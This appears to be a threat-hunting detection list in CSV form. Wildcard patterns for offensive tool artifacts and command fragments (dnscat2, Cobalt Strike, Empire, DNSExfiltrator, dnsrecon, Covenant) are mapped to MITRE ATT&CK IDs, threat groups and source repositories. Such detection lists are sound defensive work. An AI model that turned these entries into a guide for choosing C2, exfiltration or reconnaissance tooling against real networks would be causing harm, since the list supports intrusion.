-*dnsadmin_serverlevelplugindll.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*DNSAES256Handler.*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*dns-beacon *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*DNS-C2 #>*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*dnscan-master*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,1,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*dnscat -*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,0,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat tcpcat*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,0,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat*,offensive_tool_keyword,dnscat,Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. 
which is an effective tunnel out of almost every network.,T1071 - T1090 - T1571,TA0011,N/A,N/A,Data Exfiltration,https://github.com/iagox86/dnscat2,1,0,N/A,N/A,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2*.tar.bz2*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2-*.zip*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2.*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dnscat2/*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2-server*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) 
channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnscat2-win32.exe*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnschef --fakeip 127.0.0.1 -q*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dnscmd . /enumrecords /zone *,greyware_tool_keyword,dnscmd,the actor gather information about the target environment,T1018 - T1049,TA0007 - TA0009,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*dnscmd . 
/enumzones*,greyware_tool_keyword,dnscmd,the actor gather information about the target environment,T1018 - T1049,TA0007 - TA0009,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*dnsenum*,offensive_tool_keyword,dnsenum,multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.,T1218 - T1018 - T1190 - T1590 - T1012,TA0002 - TA0007,N/A,N/A,Information Gathering,https://github.com/fwaeytens/dnsenum,1,1,N/A,N/A,6,521,133,2019-10-08T19:58:40Z,2014-01-10T14:47:09Z -*DNS-Enum-*-*.log*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*dnsexfiltrator.*,offensive_tool_keyword,DNSExfiltrator,DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.,T1041 - T1048,TA0010 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/Arno0x/DNSExfiltrator,1,1,N/A,10,8,792,189,2019-10-06T22:24:55Z,2017-12-20T13:58:09Z -*DNSExfiltratorLib*,offensive_tool_keyword,DNSExfiltrator,DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.,T1041 - T1048,TA0010 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/Arno0x/DNSExfiltrator,1,1,N/A,10,8,792,189,2019-10-06T22:24:55Z,2017-12-20T13:58:09Z -*DNSListener.py*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*dnslytics-get-rootdomains*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*dnsmastermind.rb*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*dnsmorph*,offensive_tool_keyword,dnsmorph,DNSMORPH is a domain name permutation engine. inspired by dnstwist. It is written in Go making for a compact and very fast tool. 
It robustly handles any domain or subdomain supplied and provides a number of configuration options to tune permutation runs.,T1568.002 - T1568.003 - T1568.001 - T1568.004,TA0009 - TA0011,N/A,N/A,Phishing,https://github.com/netevert/dnsmorph,1,1,N/A,N/A,3,241,41,2023-08-08T06:38:59Z,2018-02-20T19:13:35Z -*dnspayload.bin*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*DNS-Persist.git*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*dnsrecon -*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - 
TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*dnsrecon*,offensive_tool_keyword,dnsrecon,DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.,T1590 - T1590.001,TA0001 - TA0007,N/A,N/A,Information Gathering,https://github.com/darkoperator/dnsrecon,1,1,N/A,6,10,2336,516,2023-09-11T05:14:02Z,2010-12-16T03:25:49Z -*dnsrecon-zonetransfer*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*dnsteal.git*,offensive_tool_keyword,dnsteal,This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.,T1048.003 - T1568.002 - T1573.002,TA0010 - TA0002,N/A,N/A,Data Exfiltration,https://github.com/m57/dnsteal,1,1,N/A,3,10,1378,236,2022-02-03T11:04:49Z,2015-08-11T17:02:58Z -*dnsteal.py*,offensive_tool_keyword,dnsteal,This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.,T1048.003 - T1568.002 - T1573.002,TA0010 - TA0002,N/A,N/A,Data Exfiltration,https://github.com/m57/dnsteal,1,1,N/A,3,10,1378,236,2022-02-03T11:04:49Z,2015-08-11T17:02:58Z -*dnsteal-master*,offensive_tool_keyword,dnsteal,This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.,T1048.003 - T1568.002 - T1573.002,TA0010 - TA0002,N/A,N/A,Data Exfiltration,https://github.com/m57/dnsteal,1,1,N/A,3,10,1378,236,2022-02-03T11:04:49Z,2015-08-11T17:02:58Z -*dnstracer*,offensive_tool_keyword,DNSTracer,This is a python application 
that traces how a DNS query is performed from a client machine to the server.,T1556 - T1016 - T1046,TA0007 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/pcoder/DNSTracer,1,0,N/A,3,1,6,1,2011-11-11T22:06:48Z,2011-07-07T18:36:07Z -*dnstwist*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -*dnsx -silent -d * -w dns_worldlist.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dnsx -silent -d domains.txt -w jira*grafana*jenkins*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*do_attack(*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*do_bypassuac*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*do_pyinject*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*Do-AltShiftEsc*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16135.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Do-AltShiftTab*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-MS16135.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*doc/extras/HACKING.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*docker * covenant*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*docker * --name elite *,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 
framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*docker * -t elite *,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*docker build -t rmg .*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*docker run */pacu:latest*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*docker run */usr/src/rde1*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*docker run */usr/src/rec2*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS 
protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*docker run -p * spring4shell,offensive_tool_keyword,Spring4Shell,Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/reznok/Spring4Shell-POC,1,0,N/A,N/A,4,303,229,2022-08-04T18:26:18Z,2022-03-31T00:24:28Z -*docker run sitadel*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*docker* donut *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*docker-compose logs wiresocks*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*DockerPwn*,offensive_tool_keyword,DockerPwn,Automation for abusing an exposed Docker TCP Socket. 
,T1068 - T1528 - T1550,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/AbsoZed/DockerPwn.py,1,0,N/A,N/A,3,208,30,2022-12-08T03:17:35Z,2019-11-23T22:32:49Z -*DocPlz-main.zip*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,1,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*DocsPLZ\DocsPLZ.*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*DoEvil()*,offensive_tool_keyword,ETWEventSubscription,Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.,T1053.005 - T1546.003 - T1055.001,TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*Do-Exfiltration.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Doge-Loader*xor.go*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,1,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z 